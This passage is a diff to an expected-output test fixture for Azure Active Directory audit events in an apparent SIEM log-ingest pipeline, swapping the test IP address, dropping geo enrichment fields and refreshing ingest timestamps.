"1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -3454,7 +3148,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -3466,12 +3160,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036164400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124925700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -3497,25 +3191,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3529,7 +3205,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -3665,7 +3341,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -3677,12 +3353,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036170100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124932400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -3708,25 +3384,7 @@ }, { "source": 